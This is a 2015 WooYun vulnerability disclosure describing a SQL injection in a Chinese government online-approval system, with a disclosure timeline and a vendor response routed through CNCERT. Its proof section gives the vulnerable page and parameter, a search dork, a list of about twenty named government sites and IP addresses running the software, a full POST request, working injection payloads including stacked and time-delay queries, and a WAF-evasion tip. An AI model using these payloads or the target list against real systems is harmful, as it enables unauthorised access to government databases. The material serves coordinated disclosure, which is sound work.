当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0119413

漏洞标题:某政务系统通用SQL注入漏洞,影响众多政府单位

相关厂商:河北邯郸连邦软件

漏洞作者: 路人甲

提交时间:2015-06-10 11:45

修复时间:2015-09-13 10:50

公开时间:2015-09-13 10:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:14

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-10: 细节已通知厂商并且等待厂商处理中
2015-06-15: 厂商已经确认,细节仅向厂商公开
2015-06-18: 细节向第三方安全合作伙伴开放
2015-08-09: 细节向核心白帽子及相关领域专家公开
2015-08-19: 细节向普通白帽子公开
2015-08-29: 细节向实习白帽子公开
2015-09-13: 细节向公众公开

简要描述:

某政务系统通用SQL注入漏洞,影响众多政府单位

详细说明:

系统开发厂商:邯郸市连邦软件发展有限公司
系统架构:ASPX+MSSQL
漏洞文件:workplate/comm/noti/mobilemsgsend.aspx
注入参数:tbMobile
关键字:inurl:workplate/
部分政府案例:
日照市网上审批系统
http://www.rzfwzx.gov.cn/workplate/
保定市网上审批系统
http://www.bdxzfw.cn/workplate/
磁县网上审批系统
http://www.cxxzfwzx.com/workplate/
魏县网上审批系统
http://wxxz.gov.cn/workplate/
邯郸县网上审批系统
http://www.hdxzwzx.com/workplate/
南郊区网上审批系统
http://xz.njqsp.com:8001/workplate/
城区网上审批系统
http://211.142.37.152:81/workplate/
左云县网上审批系统
http://211.142.37.152:88/workplate/
天镇县网上审批系统
http://211.142.37.154:83/workplate/
广灵县网上审批系统
http://211.142.37.152:83/workplate/
新荣区网上审批系统
http://183.203.128.238:82/workplate/
矿区网上审批系统
http://211.142.41.114:82/workplate/
涉县网上审批系统
http://www.hbsxxzfwzx.gov.cn/workplate/
临漳县网上审批系统
http://www.lzxzfwzx.com/workplate/
安新县网上审批系统
http://www.axxzfwzx.com/workplate/
高阳县网上审批系统
http://gyxzfw.net/workplate/
长子县网上审批系统
http://60.220.253.153:81/workplate/
屯留县网上审批系统
http://60.220.240.7/workplate/
浑源县网上审批系统
http://211.142.37.152:85/workplate/
邱县网上审批系统
www.qxxzfwzx.com/workplate/
南郊区网上审批系统
http://xz.njqsp.com:8001/workplate/
大同县网上审批系统
http://211.142.37.152:82/workplate/

漏洞证明:

漏洞验证:
http://gyxzfw.net/workplate/comm/noti/mobilemsgsend.aspx为例:
部分安装有安全狗,可使用延时注入或者space2comment.py

11.png


POST /workplate/comm/noti/mobilemsgsend.aspx HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://gyxzfw.net/workplate/comm/noti/mobilemsgsend.aspx
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/7.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: gyxzfw.net
Content-Length: 115
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=fxhjipqobhwwf2i1l04kji55
__VIEWSTATE=%2FwEPDwUKMTYwMTAyNjE2MWRkLFn9uNBntvxwAv10aePBSyjJMtE%3D&tbMsg=aa&tbMobile=aa&btnAdd=%E5%8F%91%E9%80%81


Place: POST
Parameter: tbMobile
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
Payload: __VIEWSTATE=/wEPDwUKMTYwMTAyNjE2MWRkLFn9uNBntvxwAv10aePBSyjJMtE=&tb
Msg=aa&tbMobile=aa'); IF(9183=9183) SELECT 9183 ELSE DROP FUNCTION pwbL--&btnAdd
=%E5%8F%91%E9%80%81
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKMTYwMTAyNjE2MWRkLFn9uNBntvxwAv10aePBSyjJMtE=&tb
Msg=aa&tbMobile=aa'); WAITFOR DELAY '0:0:5'--&btnAdd=%E5%8F%91%E9%80%81
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKMTYwMTAyNjE2MWRkLFn9uNBntvxwAv10aePBSyjJMtE=&tb
Msg=aa&tbMobile=aa') WAITFOR DELAY '0:0:5'--&btnAdd=%E5%8F%91%E9%80%81
---


11.png


11.png


DBA:

11.png


等等

修复方案:

如上!

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-06-15 10:48

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给河北分中心,由其后续协调网站管理单位及厂商处置。

最新状态:

暂无